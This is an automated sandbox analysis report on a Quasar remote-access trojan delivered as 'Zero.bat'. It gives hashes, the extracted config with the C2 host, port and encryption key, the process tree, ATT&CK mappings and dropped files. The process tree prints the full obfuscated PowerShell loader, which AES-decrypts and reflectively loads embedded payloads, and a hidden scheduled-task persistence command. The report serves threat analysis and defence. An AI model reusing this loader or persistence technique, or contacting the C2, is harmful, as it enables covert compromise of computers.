Analysis

  • max time kernel
    94s
  • max time network
    100s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-06-2024 12:24

General

  • Target

    Zero.bat

  • Size

    586KB

  • MD5

    2ff26433125b6ce77afd2a59f74bae89

  • SHA1

    2f5847389b977507d179ecd60cbc8590da60c5d0

  • SHA256

    9dbfff66782d04d283175444524dd531827b9e44e606ffcf5c14093f01aceb0b

  • SHA512

    b3764ca03df52012050b616c89d874909c0784eeb01c3013b7c6cd4c7b3c34372089de2f8942055144b5c08b830506d615d7210abf1e60beef23fe161505910d

  • SSDEEP

    12288:Q2x918cuchSBt6dbzm7xEbT0Jjd6Gxnw6LfDK4KbMC/I7dllU5ky:QW8B6CE/0JR6GGGuwZ765b

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Slave

C2

runderscore00-61208.portmap.host:61208

Mutex

QSR_MUTEX_cq1PvE2FSZsrtLytho

Attributes
  • encryption_key

    KqyNe9NPfFv7dzIbQXP4

  • install_name

    $phantom-powershell.exe

  • log_directory

    $phantom-Logs

  • reconnect_delay

    3000

  • startup_key

    Powershell

  • subdirectory

    $phantom-zero

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:824
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:944
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:1000
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:536
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:612
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1040
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1048
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                  1⤵
                    PID:1128
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1140
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1204
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1248
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1284
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1380
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                  PID:1420
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1496
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1516
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1660
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1708
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1796
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1804
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1920
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1972
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1984
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1096
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1900
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                        1⤵
                                                          PID:2164
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2216
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2364
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2372
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                  PID:2448
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2500
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2576
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2600
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2632
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2648
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:1368
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                                PID:3300
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zero.bat"
                                                                                  2⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1644
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yZYTRWMfUpdQsWzRNhgq0mFws977A+StI70yBGRnC+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5XRuWb4gaWV6nxs5P7YgjQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DjILw=New-Object System.IO.MemoryStream(,$param_var); $TZbgX=New-Object System.IO.MemoryStream; $QZNNR=New-Object System.IO.Compression.GZipStream($DjILw, [IO.Compression.CompressionMode]::Decompress); $QZNNR.CopyTo($TZbgX); $QZNNR.Dispose(); $DjILw.Dispose(); $TZbgX.Dispose(); $TZbgX.ToArray();}function execute_function($param_var,$param2_var){ $CndPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xOdXP=$CndPg.EntryPoint; $xOdXP.Invoke($null, $param2_var);}$KZmTg = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $KZmTg;$KKBtf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($KZmTg).Split([Environment]::NewLine);foreach ($MaKkc in $KKBtf) { if ($MaKkc.StartsWith('XIDLpYhyhveyinwDjrVI')) { $jLMlC=$MaKkc.Substring(20); break; }}$payloads_var=[string[]]$jLMlC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                    3⤵
                                                                                      PID:4472
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3284
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_784_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1632
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbs"
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4196
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.bat" "
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1088
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yZYTRWMfUpdQsWzRNhgq0mFws977A+StI70yBGRnC+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5XRuWb4gaWV6nxs5P7YgjQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DjILw=New-Object System.IO.MemoryStream(,$param_var); $TZbgX=New-Object System.IO.MemoryStream; $QZNNR=New-Object System.IO.Compression.GZipStream($DjILw, [IO.Compression.CompressionMode]::Decompress); $QZNNR.CopyTo($TZbgX); $QZNNR.Dispose(); $DjILw.Dispose(); $TZbgX.Dispose(); $TZbgX.ToArray();}function execute_function($param_var,$param2_var){ $CndPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xOdXP=$CndPg.EntryPoint; $xOdXP.Invoke($null, $param2_var);}$KZmTg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.bat';$host.UI.RawUI.WindowTitle = $KZmTg;$KKBtf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($KZmTg).Split([Environment]::NewLine);foreach ($MaKkc in $KKBtf) { if ($MaKkc.StartsWith('XIDLpYhyhveyinwDjrVI')) { $jLMlC=$MaKkc.Substring(20); break; }}$payloads_var=[string[]]$jLMlC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                            6⤵
                                                                                              PID:1944
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                              6⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2796
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3432
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                      1⤵
                                                                                        PID:3452
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                        1⤵
                                                                                          PID:4020
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4392
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:3144
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1080
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3700
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:4904
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:1848
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                    1⤵
                                                                                                      PID:4560

                                                                                                    Network

                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                    Execution

                                                                                                    Command and Scripting Interpreter

                                                                                                    1
                                                                                                    T1059

                                                                                                    PowerShell

                                                                                                    1
                                                                                                    T1059.001

                                                                                                    Discovery

                                                                                                    System Information Discovery

                                                                                                    1
                                                                                                    T1082

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                      Filesize

                                                                                                      3KB

                                                                                                      MD5

                                                                                                      df472dcddb36aa24247f8c8d8a517bd7

                                                                                                      SHA1

                                                                                                      6f54967355e507294cbc86662a6fbeedac9d7030

                                                                                                      SHA256

                                                                                                      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                                                                      SHA512

                                                                                                      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                      Filesize

                                                                                                      1KB

                                                                                                      MD5

                                                                                                      3ec0d76d886b2f4b9f1e3da7ce9e2cd7

                                                                                                      SHA1

                                                                                                      68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

                                                                                                      SHA256

                                                                                                      214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

                                                                                                      SHA512

                                                                                                      a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ss5mxmuc.5ti.ps1
                                                                                                      Filesize

                                                                                                      60B

                                                                                                      MD5

                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                      SHA1

                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                      SHA256

                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                      SHA512

                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.bat
                                                                                                      Filesize

                                                                                                      586KB

                                                                                                      MD5

                                                                                                      2ff26433125b6ce77afd2a59f74bae89

                                                                                                      SHA1

                                                                                                      2f5847389b977507d179ecd60cbc8590da60c5d0

                                                                                                      SHA256

                                                                                                      9dbfff66782d04d283175444524dd531827b9e44e606ffcf5c14093f01aceb0b

                                                                                                      SHA512

                                                                                                      b3764ca03df52012050b616c89d874909c0784eeb01c3013b7c6cd4c7b3c34372089de2f8942055144b5c08b830506d615d7210abf1e60beef23fe161505910d

                                                                                                    • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbs
                                                                                                      Filesize

                                                                                                      124B

                                                                                                      MD5

                                                                                                      a020ab46f721b2eada27ae3765ec417e

                                                                                                      SHA1

                                                                                                      ff18ae7087576d40a9c4d0551d7d71ee5d58d81c

                                                                                                      SHA256

                                                                                                      9074fef96fd6cc69bf68ee2dd64b5f303f26e8c687a4c5cc2f016ecbceab0824

                                                                                                      SHA512

                                                                                                      e8b02674c0cfcb0ef9ce64b4d7cd6d6a3c4949b3c0a47d7b4e8d702c4889dae0f43b832b7a6f45204d318a250d51b6fa9efb679c542f3f2c78529fc2bdfaa062

                                                                                                    • memory/612-110-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1080-98-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1140-102-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1324-95-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1368-106-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1420-101-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1516-103-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1632-30-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/1632-27-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/1632-26-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/1632-25-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/1796-108-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1804-109-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/1920-105-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2164-99-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2448-100-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2796-143-0x000002317B890000-0x000002317B8EE000-memory.dmp
                                                                                                      Filesize

                                                                                                      376KB

                                                                                                    • memory/2796-146-0x000002317BD70000-0x000002317BDAC000-memory.dmp
                                                                                                      Filesize

                                                                                                      240KB

                                                                                                    • memory/2796-145-0x000002317BD10000-0x000002317BD22000-memory.dmp
                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/3144-96-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/3284-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/3284-14-0x000001AAA07F0000-0x000001AAA07F8000-memory.dmp
                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/3284-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3284-13-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/3284-12-0x000001AAA0840000-0x000001AAA0886000-memory.dmp
                                                                                                      Filesize

                                                                                                      280KB

                                                                                                    • memory/3284-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/3284-9-0x000001AA88740000-0x000001AA88762000-memory.dmp
                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/3284-15-0x000001AAA0AF0000-0x000001AAA0B60000-memory.dmp
                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/3284-144-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
                                                                                                      Filesize

                                                                                                      10.8MB

                                                                                                    • memory/3300-97-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/3300-47-0x0000000005A40000-0x0000000005A6A000-memory.dmp
                                                                                                      Filesize

                                                                                                      168KB

                                                                                                    • memory/4392-107-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/4560-104-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB